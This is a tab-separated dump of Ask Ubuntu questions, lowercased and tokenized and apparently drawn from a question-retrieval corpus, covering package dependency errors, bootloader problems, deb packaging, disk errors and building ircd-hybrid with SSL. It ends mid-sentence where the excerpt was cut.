235353	how do i install the libg2c0 library ?	i am trying to install the library libg2c0 , which is required for the package xfoil . however this package is unavailable at ubuntu 12.04 . i tried the suggestions from https : //twiki.cern.ch/twiki/bin/view/sandbox/hcalradiationproject : sudo nano /etc/apt/sources.list i added the following lines at the end of the file : deb http : //archive.ubuntu.com/ubuntu hardy main universe deb-src http : //archive.ubuntu.com/ubuntu hardy main deb http : //archive.ubuntu.com/ubuntu hardy-updates main universe deb-src http : //archive.ubuntu.com/ubuntu hardy-updates main universe update the list and install the library : sudo apt-get update sudo apt-get install libg2c0 when these commands are executed i get the error : the following packages have unmet dependencies : libg2c0 : depends : gcc-3.4-base ( = 3.4.6-6ubuntu5 ) but it is not going to be installed additionally i tried to install the package from ubuntupackages , but this did not work either . i hope you can give me some hints about how to solve this problem . would be really appreciated .
235362	trying to reinstall grub 2 , can not find a device for /boot ( is /dev mounted ? )	i was trying to install a new ubuntu 12.04 installation next to my old 10.10 installation , and i 've run into a problem . my computer seems to have a finicky bios , and wants a boot partition less than 40 gb in size . so , when i installed 10.10 , i split the system into /boot on /dev/sda1 and / on /dev/sda6 . when i installed 12.04 lts , i totally forgot about it , and now i need to reinstall grub . but , i seem to be getting an error . mint @ mint ~ $ sudo grub-install -- root-directory=/mnt /dev/sda grub-probe : error : can not find a device for /boot ( is /dev mounted ? ) . installation finished . no error reported . i 'm running this from a linux mint live usb device that i had lying around , the grub version is the same as the one ubuntu 12.04 uses , i think . so , is there something i 'm missing , or would it be a better idea to just restart the ubuntu installation ?
235365	i 've installed inkscape via `` apt-get install '' in lxterminal but i cant find where is it ?	i 'm new to lubuntu , i was using ubuntu with unity for 1 year and i have n't faced such a case ! please help me : ( !
235369	can i develop ubuntu for phones apps in python ?	does anyone know if we can develop apps for ubuntu for phones in python ? pyqt / pyside would seem to support also qml . but can we use them on the phones ?
235370	how can several branches be nested in the same directory in a bzr-builder recipe ?	i have the following recipe : # bzr-builder format 0.3 deb-version 7.0+ { revno } lp : ~bitglue/openobject-server/7.0 nest addons lp : ~bitglue/openobject-addons/7.0 openerp/addons nest-part web lp : ~openerp/openerp-web/7.0 addons openerp/addons the base openobject-server has an openerp/addons directory with some stuff in it . the other projects have more addons which i want to stuff in the same openerp/addons directory . the problem is that as this is being built , a conflict on openerp/addons is generated . none of the subdirectories have the same name , so all these things could peacefully coexist . i thought about nest-parting the individual addons , but there are many , many addons in openobject-addons . it would be very tedious to list each one individually , plus i 'd have to remember to touch the recipe when adding a new addon . any way around this ?
235373	how can i show the connecting line in treeview of nautilus ?	i want to display the line that connect childnode with parent of treeview itmes . same as unchecking the `` display simple folder view in explorer 's folders list '' in windows-xp 's folder options like this : how can i do that ?
235377	libgtk-3-0 dependency issues	i 've been trying to update standard packages on my ubuntu box . there 's literally nothing extra on this box except for virtualbox for some windows stuff i run . here 's one output : $ sudo apt-get update [ ... ] $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libgail-3-0 : depends : libgtk-3-0 ( = 3.6.0-0ubuntu3.2 ) but 3.6.0-0ubuntu3.1 is installed libgtk-3-0 : depends : libgtk-3-common ( = 3.6.0-0ubuntu3.1 ) but 3.6.0-0ubuntu3.2 is installed libgtk-3-bin : depends : libgtk-3-0 ( > = 3.6.0-0ubuntu3.2 ) but 3.6.0-0ubuntu3.1 is installed and another with the -f option : $ sudo apt-get -f upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be upgraded : libgtk-3-0 overlay-scrollbar-gtk3 2 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 26 not fully installed or removed . need to get 0 b/2,397 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 203437 files and directories currently installed . ) preparing to replace libgtk-3-0 : amd64 3.6.0-0ubuntu3.1 ( using ... /libgtk-3-0_3.6.0-0ubuntu3.2_amd64.deb ) ... unpacking replacement libgtk-3-0 : amd64 ... dpkg : error processing /var/cache/apt/archives/libgtk-3-0_3.6.0-0ubuntu3.2_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/gtk-3.0/3.0.0/immodules ' , which is also in package ibus-gtk3 : amd64 1.4.1-7ubuntu1 preparing to replace overlay-scrollbar-gtk3 : amd64 0.2.16+r357-0ubuntu1 ( using ... /overlay-scrollbar-gtk3_0.2.16+r357-0ubuntu1.1_amd64.deb ) ... unpacking replacement overlay-scrollbar-gtk3 : amd64 ... dpkg : error processing /var/cache/apt/archives/overlay-scrollbar-gtk3_0.2.16+r357-0ubuntu1.1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/gtk-3.0/modules ' , which is also in package libcanberra-gtk3-module : amd64 0.29-0ubuntu2 errors were encountered while processing : /var/cache/apt/archives/libgtk-3-0_3.6.0-0ubuntu3.2_amd64.deb /var/cache/apt/archives/overlay-scrollbar-gtk3_0.2.16+r357-0ubuntu1.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here 's the output for apt-cache policy for all packages concerned : pastebin d3ycjpmj . all seem to be from the official quantal and quantal-updates release channel and an official mirror . i 've also tried sudo apt-get -f install , sudo apt-get dist-upgrade and sudo apt-get clean & & sudo rm -r /var/cache/apt/archives/ , but all lead to the same error .
235378	`` dh_install : hamsterdb-dev missing files ( usr/lib/pkgconfig/* ) , aborting '' building a package	i 'm author of a small open-source database library and want to supply .deb packages through my ppa . i have a couple of problems . i followed the documentation and several tutorials and created a debian/ directory , but when i run 'dpkg-buildpackage -rfakeroot ' i get the following error : dh_install : hamsterdb-dev missing files ( usr/lib/pkgconfig/* ) , aborting make : *** [ binary ] error 2 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 do i have to supply a /usr/lib/pkgconfig/hamsterdb-dev.pc ? during the build process , the unittests are started and many files are created or modified . when i run dpkg-buildpackage again then i get many errors , here are excerpts : dpkg-source : error : old version is plain file dpkg-source : error : can not represent change to hamsterdb/install-sh : dpkg-source : error : new version is symlink to /usr/share/automake-1.11/install-sh dpkg-source : error : old version is plain file or these : dpkg-source : error : can not represent change to tools/tests/db1.db : binary file contents changed dpkg-source : error : add tools/tests/db1.db in debian/source/include-binaries if you want to store the modified binary in the debian tarball dpkg-source : warning : executable mode 0775 of 'tools/tests/export_import.sh ' will not be represented in diff dpkg-source : warning : executable mode 0775 of 'tools/tests/ham_dump/generate.sh ' will not be represented in diff dpkg-source : warning : executable mode 0775 of 'tools/tests/ham_dump/compare.sh ' will not be represented in diff dpkg-source : warning : executable mode 0775 of 'tools/tests/ham_info/generate.sh ' will not be represented in diff dpkg-source : warning : file hamsterdb/documentation/latex/namespacehamsterdb.tex has no final newline ( either original or modified version ) dpkg-source : warning : file hamsterdb/documentation/latex/index.tex has no final newline ( either original or modified version ) dpkg-source : error : unrepresentable changes to source dpkg-buildpackage : error : dpkg-source -b hamsterdb gave error exit status 2 is there a way to `` force '' the generation of a deb file ? or simply to ignore those `` unrepresentable changes to source '' errors ? i managed to fix the errors that i listed above , but now i run into another one ( might also be caused by my lack of knowledge regarding automake ) . debuild runs `` libtool '' on the library sources , but does not create any output files ( at least i do not find any ) . and building the sample then fails with an error : make [ 3 ] : entering directory `/home/chris/prj/hamsterdb/samples' gcc -std=gnu99 -dhave_config_h -i . -i.. -i../include -i../include -g -o2 -wall -dham_little_endian -fno-tree-vectorize -d_file_offset_bits=64 -c db1.c make [ 3 ] : *** no rule to make target `../src/libhamsterdb.la ' , needed by `db1 ' . this is how i invoke the build command : db1_sources = db1.c db1_ldadd = $ ( top_builddir ) /src/libhamsterdb.la the libhamsterdb.la is indeed missing .
235386	selinux folder in root directory ( / )	while navigating through my files , i noticed a `` selinux '' folder in root ( / ) ; it does n't have any files in it , has completely root ( root ) permissions , and when i looked up about it , it seems to be some sort of server administration program or something . it also appears to have become unattended since karmic , and is apparently completely broken in precise . just to make sure , i ran sudo apt-get remove selinux in the terminal , and sure enough , it said i had no such program installed . can i delete this folder ? is there anything else i should remove/purge ? lastly , any ideas as to how this folder might have got here ? i never installed selinux on my computer , as far as i can remember ... edit : i also just noticed another folder called `` srv '' . it , as well , has no files in it and is owned by root . is this folder related to the `` selinux '' folder , and can i delete it as well ? running xubuntu 12.10
235392	use output from alias command as filename to open in vi	i set up an alias this morning to help finding the latest log file in a directory . my alias looks like alias latest= '' ls -lat | grep ^- | awk ' { print \ $ 8 } ' | head -1 '' in my research so far this morning i 've read a blog - parsingls which tells me this is probably not the best way to do it - let 's ignore that for now , i can look at making a better alias using find later . for now assume i have a perfectly working command expected to output a filename from the current directory . i thought i was going to be able to do latest | vi , to open the latest modified file in the directory , but it seems this wo n't work - vi complains that the output is not a terminal . i saw a stackoverflow question which suggested the issue is related to subshells and piping and so tried latest | vi < `tty` > `tty` but that just gets me `tty` : ambiguous redirect i 'm sure there 's something basic i am not getting about pipes here - i only recently started trying to use them in earnest , any ideas ?
235393	boot from live cd , then install from usb stick ? ( because cdrom drive extremely slow/faulty )	i am trying to install xubuntu on an old pc with : a usb port that ca n't boot , but otherwise works fine . a cdrom drive that can boot , but is extremely slow and fails often . i created a usb stick with usb-creator , burned the xubuntu 12.10 iso to a cdrw , inserted them , then switched on , selected `` try xubuntu '' . it took 2 hours , but now i am trying xubuntu and writing this question from it . question : how can i now install from the usb stick , rather than using the extremely slow/faulty cdrom drive ? actually , installing from cdrom is not even an option , so i must find a way to use the usb stick , despite my motherboard not being able to boot from usb . here is why : because of a bug with athlon cpus , i must remove a particular package , and i get a read error from the cdrom drive : sudo apt-get remove ubiquity-slideshow-xubuntu reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : ubiquity-slideshow-xubuntu 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 1263 kb disk space will be freed . do you want to continue [ y/n ] ? ( reading database ... 132314 files and directories currently installed . ) removing ubiquity-slideshow-xubuntu ... dpkg : error processing ubiquity-slideshow-xubuntu ( -- remove ) : unable to securely remove '/usr/share/doc/ubiquity-slideshow-xubuntu/todo.dpkg-tmp ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 1 )
235394	how to get mit-scheme from the package manager ?	i installed the latest version of x64 lubuntu and i want to install a scheme interpreter . strangely , in synaptic only debugger and documentation is available to install . i would rather not compile my own version as this would be hard to maintain in the future . how do i resolve this problem ? mike @ ubuntu : ~/desktop/aplan $ sudo apt-get install mit-scheme reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mit-scheme : i386 : depends : libmhash2 : i386 but it is not going to be installed recommends : mime-support : i386 but it is not installable e : unable to correct problems , you have held broken packages .
235403	blogengine.net on mono	i 'd like to set up the new 2.7 blogengine on mono using ubuntu , but i experience issues with it . it has support for mono because there is another project called blogengine.web on codeplex which is created for such as monodevelop . i 've got the source using tortuisehg and tried to compile on a clean ubuntu 12.04 using the monodevelop . the source compiled successfully , but when i tried to run it , i get the following exception : compilation error description : error compiling a resource required to service this request . review your source file and modify it to fix this error . compiler error message : cs0436 : the type `resources.labels ' conflicts with the imported type of same name ' . ignoring the imported type definition source error : line 26 : public static system.resources.resourcemanager resourcemanager { line 27 : get { line 28 : if ( ( labels._resourcemanager ! = null ) ) { line 29 : return labels._resourcemanager ; line 30 : } source file : /tmp/jeremy-temp-aspnet-0/5593eb70/app_web_10b27ebd_0.cs line : 28 show detailed compiler output : dmcs /target : library /lib : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin '' /debug+ /optimize- /warnaserror /warn:4 /out : '' /tmp/jeremy-temp-aspnet-0/5593eb70/app_globalresources.70277c2e.dll '' /r : '' /usr/lib/mono/4.0/mscorlib.dll '' /r : '' /usr/lib/mono/gac/microsoft.csharp/4.0.0.0__b03f5f7f11d50a3a/microsoft.csharp.dll '' /r : '' /usr/lib/mono/gac/system/4.0.0.0__b77a5c561934e089/system.dll '' /r : '' /usr/lib/mono/gac/system.configuration/4.0.0.0__b03f5f7f11d50a3a/system.configuration.dll '' /r : '' /usr/lib/mono/gac/system.web/4.0.0.0__b03f5f7f11d50a3a/system.web.dll '' /r : '' /usr/lib/mono/gac/system.data/4.0.0.0__b77a5c561934e089/system.data.dll '' /r : '' /usr/lib/mono/gac/system.web.services/4.0.0.0__b03f5f7f11d50a3a/system.web.services.dll '' /r : '' /usr/lib/mono/gac/system.xml/4.0.0.0__b77a5c561934e089/system.xml.dll '' /r : '' /usr/lib/mono/gac/system.drawing/4.0.0.0__b03f5f7f11d50a3a/system.drawing.dll '' /r : '' /usr/lib/mono/gac/system.enterpriseservices/4.0.0.0__b03f5f7f11d50a3a/system.enterpriseservices.dll '' /r : '' /usr/lib/mono/gac/system.identitymodel/4.0.0.0__b77a5c561934e089/system.identitymodel.dll '' /r : '' /usr/lib/mono/gac/system.runtime.serialization/4.0.0.0__b77a5c561934e089/system.runtime.serialization.dll '' /r : '' /usr/lib/mono/gac/system.xaml/4.0.0.0__b77a5c561934e089/system.xaml.dll '' /r : '' /usr/lib/mono/gac/system.servicemodel/4.0.0.0__b77a5c561934e089/system.servicemodel.dll '' /r : '' /usr/lib/mono/gac/system.servicemodel.web/4.0.0.0__31bf3856ad364e35/system.servicemodel.web.dll '' /r : '' /usr/lib/mono/gac/system.core/4.0.0.0__b77a5c561934e089/system.core.dll '' /r : '' /usr/lib/mono/gac/system.web.extensions/4.0.0.0__31bf3856ad364e35/system.web.extensions.dll '' /r : '' /usr/lib/mono/gac/system.data.datasetextensions/4.0.0.0__b77a5c561934e089/system.data.datasetextensions.dll '' /r : '' /usr/lib/mono/gac/system.xml.linq/4.0.0.0__b77a5c561934e089/system.xml.linq.dll '' /r : '' /usr/lib/mono/gac/system.componentmodel.dataannotations/4.0.0.0__31bf3856ad364e35/system.componentmodel.dataannotations.dll '' /r : '' /usr/lib/mono/gac/system.web.dynamicdata/4.0.0.0__31bf3856ad364e35/system.web.dynamicdata.dll '' /r : '' /usr/lib/mono/gac/system.data.linq/4.0.0.0__b77a5c561934e089/system.data.linq.dll '' /r : '' /usr/lib/mono/gac/system.web.applicationservices/4.0.0.0__31bf3856ad364e35/system.web.applicationservices.dll '' /r : '' /usr/lib/mono/gac/system.management/4.0.0.0__b03f5f7f11d50a3a/system.management.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/microsoft.web.infrastructure.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/system.web.razor.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/system.web.webpages.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/system.web.webpages.razor.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/system.web.helpers.dll '' /r : '' /tmp/jeremy-temp-aspnet-0/5593eb70/app_globalresources.6d61537.dll '' /r : '' /tmp/jeremy-temp-aspnet-0/5593eb70/app_code.3e3211f7.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/ajaxmin.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/blogengine.core.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/blogengine.web.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/blogml.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/icsharpcode.sharpziplib.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/nuget.core.dll '' /r : '' /home/jeremy/development/blogengine.web/blogengine/blogengine.web/bin/system.web.webpages.deployment.dll '' /d : debug /resource : '' /tmp/jeremy-temp-aspnet-0/5593eb70/resources.labels.resources '' -- `` /tmp/jeremy-temp-aspnet-0/5593eb70/app_web_10b27ebd_0.cs '' /tmp/jeremy-temp-aspnet-0/5593eb70/app_web_10b27ebd_0.cs ( 28,22 ) : error cs0436 : the type `resources.labels ' conflicts with the imported type of same name ' . ignoring the imported type definition /tmp/jeremy-temp-aspnet-0/5593eb70/app_globalresources.6d61537.dll ( location of the symbol related to previous error ) sorry for the question , but i did not get answers on the blogengine forum , so i decided to ask the pros ; - ) thanks in advance , ku
235405	problems in terminal	after i pasted these lines in terminal : sudo add-apt-repository ppa : canonical-qt5-edgers/qt5-beta1 & & sudo apt-get update & & sudo apt-get install qt5-meta-full & & echo 'export path=/opt/qt5/bin : $ path ' > > ~/.bashrc it asks for my sudo password . i do not know what to do next .
235406	qml ui-toolkit on ubuntu 12.04	i am using ubuntu 12.04 and i prefer to keep on an lts distribution . i tried to install the qml ui-toolkit and the ppa does n't work on my current install of ubuntu . will i be able to install it ? will you port the repository ? i do n't think i will update since i work with my computer and i prefer to stick to an lts . thank you .
235409	windows install vs cd/usb install	i am looking to install ubuntu primarily because i often muck around with my windows system files ( authui.dll & explorerframe.dll being the main two ) and read that if i happen to corrupt these dll 's really badly and ca n't access them to fix/replace them from the windows os i can access them from the ubuntu os . first up is this true ? and if it is , should i install ubuntu using the windows installer or via the cd/usb drive method ? i was reading about the differences between these two options and for the windows installer method one difference stated was that `` if your windows install goes pear-shaped , you may lose access to your wubi install , too . '' so from this i 'm lead to think that in my case it would pointless to have ubuntu there if i install it through the windows installer , so i should choose the cd/usb option . some clarification on the issue would be much appreciated . thanks : ) p.s . i 'm a really inexperienced user ( have never installed ubuntu before or used a dual boot system ) so i 'm really sorry if the question i asked seems stupid .
235410	unable to download ubuntu from the official website in windows	i tried to download ubuntu from the main website twice , even made a donation through paypal , yet both times the download i expected did n't start . i was also not prompted where to do the download either . what am i missing here ? may it help to disable windows firewall ?
235415	how do i get brightness controls working on a dell xps m1710 ?	i 've been reading on for a while now on how to resolve the issue of my backlight not working . i 'm using dell xps m1710 and my fn arrow keys are able to control the brightness slider but the actual brightness does n't change . i 've tried many different things so far and the only things that shows any progress is typing xbacklight = 10 into my terminal which only gets me a flash of what i 'd hope my screen looked like right now . any guidance ?
235421	will upgrading ubuntu affect ( data in ) my local subversion repositories ?	i have a ubuntu 11.04 installation and i use it for a local subversion repository . since 11.04 is no longer supported , i am going to upgrade to a supported release soon , and if possible to the latest version . if i upgrade , will my subversion data be hidden or lost in some way ?
235422	how to maintain ssd cache with dual boot	i have a samsung series 7 chronos laptop . it has an 8gb ssd cached to a 1tb hard drive using some intel caching utility to enable a fast boot . furthermore , it has windows 8 installed on it . my question is how can i dual-boot with ubuntu and not mess up the ssd cache that that is set up in windows 8 . thanks in advance
235428	how to install ubuntu qml toolkit on 10.04	it is exactly what the title says . i am trying to follow the instructions on the main portion of ubuntu 's app developer page , but something is not working for me . is it because it is not supported under 10.04 ? any help is much appreciated . justin
235430	error when mounting hdd	am getting the following dmesg output when i try to mount an hdd or try to boot the pc with the hdd connected : [ 65.553627 ] ata4 : limiting sata link speed to 1.5 gbps [ 65.553634 ] ata4.00 : exception emask 0x10 sact 0x3 serr 0x4090000 action 0xe frozen [ 65.553637 ] ata4.00 : irq_stat 0x00400040 , connection status changed [ 65.553648 ] ata4 : serror : { phyrdychg 10b8b devexch } [ 65.553651 ] ata4.00 : failed command : read fpdma queued [ 65.553656 ] ata4.00 : cmd 60/20:00:00:08 : b3/00:00:1a:00:00/40 tag 0 ncq 16384 in [ 65.553656 ] res 40/00:08:08:09:84/00:00 : ae:00:00/40 emask 0x10 ( ata bus error ) [ 65.553658 ] ata4.00 : status : { drdy } [ 65.553660 ] ata4.00 : failed command : write fpdma queued [ 65.553664 ] ata4.00 : cmd 61/40:08:08:09:84/00:00 : ae:00:00/40 tag 1 ncq 32768 out [ 65.553664 ] res 40/00:08:08:09:84/00:00 : ae:00:00/40 emask 0x10 ( ata bus error ) [ 65.553666 ] ata4.00 : status : { drdy } [ 65.553670 ] ata4 : hard resetting link [ 70.574212 ] ata4 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 70.575983 ] ata4.00 : configured for udma/133 [ 70.590125 ] sd 3:0:0:0 : > [ sdb ] [ 70.590129 ] result : hostbyte=did_ok driverbyte=driver_sense [ 70.590132 ] sd 3:0:0:0 : > [ sdb ] [ 70.590134 ] sense key : aborted command [ current ] [ descriptor ] [ 70.590138 ] descriptor sense data with sense descriptors ( in hex ) : [ 70.590140 ] 72 0b 00 00 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 70.590150 ] ae 84 09 08 [ 70.590154 ] sd 3:0:0:0 : > [ sdb ] [ 70.590156 ] add . sense : no additional sense information [ 70.590159 ] sd 3:0:0:0 : > [ sdb ] cdb : [ 70.590160 ] read ( 10 ) : 28 00 1a b3 08 00 00 00 20 00 [ 70.590169 ] end_request : i/o error , dev sdb , sector 447940608 [ 70.590184 ] sd 3:0:0:0 : > [ sdb ] [ 70.590186 ] result : hostbyte=did_ok driverbyte=driver_sense [ 70.590188 ] sd 3:0:0:0 : > [ sdb ] [ 70.590189 ] sense key : aborted command [ current ] [ descriptor ] [ 70.590192 ] descriptor sense data with sense descriptors ( in hex ) : [ 70.590194 ] 72 0b 00 00 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 70.590208 ] ae 84 09 08 [ 70.590210 ] sd 3:0:0:0 : > [ sdb ] [ 70.590211 ] add . sense : no additional sense information [ 70.590212 ] sd 3:0:0:0 : > [ sdb ] cdb : [ 70.590212 ] write ( 10 ) : 2a 00 ae 84 09 08 00 00 40 00 [ 70.590216 ] end_request : i/o error , dev sdb , sector 2927888648 [ 70.590220 ] ata4 : eh complete [ 70.590250 ] aborting journal on device sdb1-8 . [ 71.008917 ] ext4-fs error ( device sdb1 ) : ext4_journal_start_sb:370 : detected aborted journal [ 71.008923 ] ext4-fs ( sdb1 ) : remounting filesystem read-only [ 101.131028 ] [ drm ] nouveau 0000:01:00.0 : pfifo : unknown status 0x40000000 [ 103.350801 ] [ drm ] nouveau 0000:01:00.0 : pfifo : unknown status 0x40000000 [ 155.407876 ] ata4 : exception emask 0x10 sact 0x0 serr 0x4090000 action 0xe frozen [ 155.407879 ] ata4 : irq_stat 0x00400040 , connection status changed [ 155.407880 ] ata4 : serror : { phyrdychg 10b8b devexch } [ 155.407883 ] ata4 : hard resetting link [ 160.430297 ] ata4 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 160.432121 ] ata4.00 : configured for udma/133 [ 160.446222 ] ata4 : eh complete [ 163.768313 ] ata4 : exception emask 0x10 sact 0x0 serr 0x4090000 action 0xe frozen [ 163.768318 ] ata4 : irq_stat 0x00400040 , connection status changed [ 163.768321 ] ata4 : serror : { phyrdychg 10b8b devexch } [ 163.768326 ] ata4 : hard resetting link [ 169.237531 ] ata4 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 169.239249 ] ata4.00 : configured for udma/133 [ 169.253459 ] ata4 : eh complete what can i make of this ?
235433	12.10 partial upgrade from 12.04 now the gui doesnt appear	a partial upgrade was completed from 12.04 to 12.10. i can log in but after that nothing happens . no response to the alt keys unless its the alt and sysrq or ctrl alt del . thanks in advance
235439	unable to boot ubuntu from usb and other external media	i replaced my laptop 's hard drive a few months back and promptly installed 12.04 on it . however , since there were still some files for which i needed windows 7 , i installed windows 7 afterwards , removing my access to ubuntu and the dual-boot setup which i had intended to build . i only realized a couple weeks afterwards that i had the installation order mixed up , but since i was in the middle of classes , and most of what i 'm doing now does n't require ubuntu/*nix , i let it slide . now that i 'm back to doing my own projects , i need ubuntu again , and have tried ( and repeatedly ) failed to get my computer to boot into the ubuntu desktop installer for 12.10 . i 've tried : booting from usb ( with the help of universal usb installer ) . booting from dvd . booting from esata . booting from ethernet/network . no matter how i try though , even after editing the bios load order to load the hard drive last , it still refuses to boot it from any of these sources . tl ; dr i installed ubuntu 12.04 ( 64 bit ) desktop on my computer , then windows 7 , which removed my ability to access ubuntu . am now trying to install ubuntu 12.10 ( 64 bit ) desktop , but computer does not boot from any external sources . is there a workaround , or will i just have to reformat my hard drive and start from scratch again ? specs : computer : toshiba l655-s5075 hard drive : seagate momentus 7200 750 gb cpu : intel core i3 2.26 ghz ( 64-bit ) ram : 4 gb ddr3
235441	how do i start developing applications for ubuntu on mobile devices ?	i 've come away a little confused on how to develop mobile apps for ubuntu . first of all , do developers need the ubuntu operating system to develop for ubuntu ? is it possible to develop ubuntu apps in windows ? also , phonegap was mentioned somewhere along the way . i 'm guessing this is something which is n't implemented yet ? where can i find out more information ? i 'm currently using phonegap to target android and windows phone , so it would be great if i could target ubuntu with phonegap too !
235443	disappearing windows in gnome 3	i 've been searching like mad , but have n't been able to find anyone with a similar problem , so here it goes . i 'm running ubuntu 12.10 with gnome 3 on my lenovo t400 . almost once every day or two , i 'll have a couple windows open , and all of a sudden , they 'll disappear . the only thing that 's left is my background with the top panel from gnome . ( and i think it 's grayed out a bit , like something 's overlaid on the backgroud . ) if i hit the windows super key or click `` activities '' , they 'll all show up , as usual . however , the favorites menu along with the search bar will be missing . as soon as i hit the super key to return , the windows disappear again , leaving me with only the desktop . similarly , alt+tab brings shows me the different windows ( as i have coverflow installed ) , but then nothing once i let go . any similar problems , suggestions , references ?
235444	facebook webapp does n't work	all my unity-webapps work with chromium , except for facebook . it popped up the bar to ask me to install , i did , and the unity-webapps-facebookmessenger package was installed . however , it does not appear in the dash or launcher . i think i 've traced the problem to a missing .desktop file in ~/.local/share/applications , all the working ones are there but facebook is n't . however , i do n't know what the contents of the facebook .desktop file should be so now i 'm stuck . any suggestions ? steven @ steven-pc : ~ $ ls /home/steven/.local/share/applications/ gmailmailgooglecom.desktop livecommaillivecom.desktop googlecalendargooglecom.desktop mimeapps.list googledocsdocsgooglecom.desktop tumblrtumblrcom.desktop googleplusgooglecom.desktop twittertwittercom.desktop launchpadlaunchpadnet.desktop
235445	why is ext4 's journaling i/o usage so high when copying files to my raid1 ?	this just barely started occurring and i feel like this is not a bug but a configuration error ( hopefully ) . i 'm on 12.04 , 64-bit and have been happily stable for many months . my raid1 is years old and has also had no issues until recently . the disks are healthy . as of today , though , every time i try to copy files over to the raid the journaling daemon goes bonkers and uses 99 % of the disk io , forcing my file transfer speed to pathetic amounts ( usually 1 mb/s ) . i 've tried restarting to no effect ( i have n't changed any settings anywhere to my knowledge . attached is a screenshot of iotop demonstrating the usage : when not copying it goes back down to 0 percent . here is my /etc/fstab : # / was on /dev/sdh2 during installation uuid=15bb606e-54af-4fa3-8341-12824a404dae / ext4 errors=remount-ro 0 1 # /home was on /dev/sdh3 during installation uuid=9eed87ee-f9d5-47c7-91e5-b82696142f7e /home ext4 defaults 0 2 # swap was on /dev/sdh4 during installation uuid=27f06259-705d-48ba-83d6-3e1837a87198 none swap sw 0 0 # music raid uuid=d10e627b-6068-4734-9111-5e2f71dbbe4f /media/music_library ext4 auto , user , sync 0 1 output of /proc/mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md127 : active raid1 sdb1 [ 1 ] sdh1 [ 0 ] 292968181 blocks super 1.2 [ 2/2 ] [ uu ] unused devices : < none > df -h : /dev/md127p1 276g 112g 150g 43 % /media/music_library please advise , and thank you : )
235449	i 'm building a dedicated distrbuted computing ( fah ) rig and need help to intall ubuntu	intel s5520sc workstation board with dual intel x5570 hyperthreaded quad core cpu 's , 24gb unbuffered ddr3 , 320gb wd hd , 2 x ati hd 5770 gpu . i have prepared a bootable usb key with ubuntu-12.10-desktop-amd64 which i have tested prior to attempting install of the os . is there anything elese i need to do before and/or after installing the os in order to install the folding @ home for ubuntu app ? mark
235456	ubuntu 12.04 lts , ssl , irc : unable to build with openssl	i have a small server running ubuntu 12.04 lts . on it i wanted to set up irc with ssl support . it appears that ircd-hybrid is most popular . i am not married to using it so other options are welcome . however , i am not seeing other options . i have installed using apt-get . that is n't the problem . the problem is that the apt-get install version does n't enable ssl . try connecting to the ssl port 6697 using ssl and it will not work . hence the work to build it myself . if you actually follow the source of the ircd-hybrid package the configuration requires that you edit it and add the `` use_openssl = 1 '' option . because hybrid doesnât support openssl by default , you have to do a manual patch to get it working . anyway , i followed the instructions ( i listed a couple at the end ) and install ircd-hybrid no problem . it 's actually running now . however , i noticed that ssl is n't working . the port is never being listened to . digging deeper , i look back at the building process and notice that openssl is n't being included . so i have been trying to build and just to clarify , here is the ./configure output : compiling ircd-hybrid 7.2.2 installing into : /usr ziplinks ... ... ... ... ... . yes **openssl ... ... ... ... ... .. no** modules ... ... ... ... ... .. shared ipv6 support ... ... ... ... yes net i/o implementation .. sigio efnet server ... ... ... ... no ( use example.conf ) halfops support ... ... ... yes small network ... ... ... .. no g-line voting ... ... ... .. yes a few line up in the output of the ./configure script i notice that it seems that all the encryption algos are unavailable ! checking for openssl ... /usr checking for openssl 0.9.6 or above ... found checking for rsa_free in -lcrypto ... yes checking for evp_bf_cfb ... no checking for evp_cast5_cfb ... no checking for evp_idea_cfb ... no checking for evp_rc5_32_12_16_cfb ... no checking for evp_des_ede3_cfb ... no checking for evp_des_cfb ... no which if you look into the configure script you 'll see that at least one of the encryption libraries need to be enabled . this is a hunch as i am not entirely positive about this . it seems that openssl has disabled rc5 and a couple other algos . i 've rebuilt and installed openssl with the enable-rc5 and other flags but no dice . this is on ubuntu 12.04 . help ? anyone ? i 'd like to enable ssl on irc on my personal server . it does n't have to be ircd-hybrid . i have been looking at the forums on ubuntu and generally following these instructions . thanks ! edit i have been chatting with the fella that figured out the solution on the first link i posted above . he was able to successfully build and run with ssl on a clean 12.04 install using the default openssl package and the patched pircd-hybrid package . the system i am on was originally built using 10.x . i wonder if doing those upgrades to 12.04 lts somehow broke something along the way . for example , his running of the ircd-hybrid configuration yields these 